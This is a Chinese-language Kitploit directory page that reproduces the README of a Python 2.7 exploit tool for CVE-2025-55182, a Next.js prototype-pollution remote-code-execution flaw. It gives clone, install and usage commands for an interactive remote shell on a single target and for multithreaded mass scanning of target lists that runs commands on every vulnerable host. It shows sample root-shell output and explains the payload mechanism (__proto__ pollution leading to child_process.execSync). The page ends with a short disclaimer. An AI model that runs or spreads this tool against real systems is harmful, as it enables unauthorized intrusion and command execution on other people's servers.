Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 利用工具 – 针对 Next.js 原型污染导致 RCE 的 Python 2.7 漏洞利用程序 | Kitploit
工具/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 利用工具 – 针对 Next.js 原型污染导致 RCE 的 Python 2.7 漏洞利用程序

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
612个月前尚未审核

CVE-2025-55182 - React2shell

一个用于 CVE-2025-55182 的 Python 2.7 漏洞利用工具——该漏洞是 Next.js 应用程序中的一个严重原型污染 / RCE 漏洞。
该工具支持单目标交互式 Shell 和多主机批量扫描,具备多线程、彩色输出以及自动 HTTPS 回退功能。


🚀 功能特性

  • ✅ 交互式 Shell —— 针对单个目标,可执行任意系统命令
  • ✅ 批量扫描 —— 从文件列表中读取目标,多线程、速度快,结果自动保存
  • ✅ 自动检测 —— 单个 URL → Shell 模式,现有文件 → 批量扫描模式
  • ✅ 自动 HTTPS —— 若未提供协议,则自动添加 https://
  • ✅ 线程安全的文件写入 —— 实时保存存在漏洞的结果
  • ✅ 自定义命令 —— 将默认的 id 更改为任意命令(whoami、ls 等)
  • ✅ 无外部依赖 —— 仅需 requests(易于安装)

📋 环境要求

  • Python 2.7(该工具专门为 Python 2.7 编写)
  • requests 库 —— 使用以下命令安装:
    root@kitploit:~
    pip install requests
    

  • 支持 ANSI 颜色的终端(大多数 Linux/macOS 终端、Windows Terminal、PowerShell)

📦 安装

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

使脚本可执行(可选):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 使用方法

1. 交互式 Shell(单目标)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

或者不带协议(将自动添加 HTTPS):

root@kitploit:~
python2 CVE-2025-55182.py target.com

一旦连接并确认存在漏洞,您将获得一个 Shell 提示符:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

内置命令:

  • exit / quit —— 关闭 Shell
  • clear —— 清屏
  • help —— 显示帮助

2. 批量扫描(目标列表)

准备一个文件,每行一个目标(可带或不带 http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

运行批量扫描(默认:10 个线程,命令 id,输出文件 res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

自定义线程数、命令、输出文件:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
  • 20 —— 线程数
  • whoami —— 在每个存在漏洞的目标上执行的命令
  • results.txt —— 输出文件(仅保存存在漏洞的条目)

批量扫描输出示例:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

已保存的结果(res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 工作原理

该漏洞利用会向 Next.js 端点发送一个精心构造的 multipart/form-data 请求(如果路径为空,则附加 /login)。 它滥用原型污染(__proto__:then 和 constructor:constructor)来注入一个恶意前缀,从而使用 child_process.execSync() 执行系统命令。

服务器会响应一个 303 重定向,其中包含位于 x-action-redirect 头(或 Location)中的命令输出。该工具从 /login?a=<output> 中提取结果。


🛡️ 免责声明

本工具仅用于教育目的和授权安全测试。 未经授权访问计算机系统属于违法行为。作者对因使用本软件而造成的任何误用或损害不承担任何责任。 在使用此漏洞利用工具之前,您必须获得目标系统所有者的明确书面许可。

更多免责声明,请参阅 Jenderal92 主页上的封面声明。您可以点击 此处查看 !!!

下载工具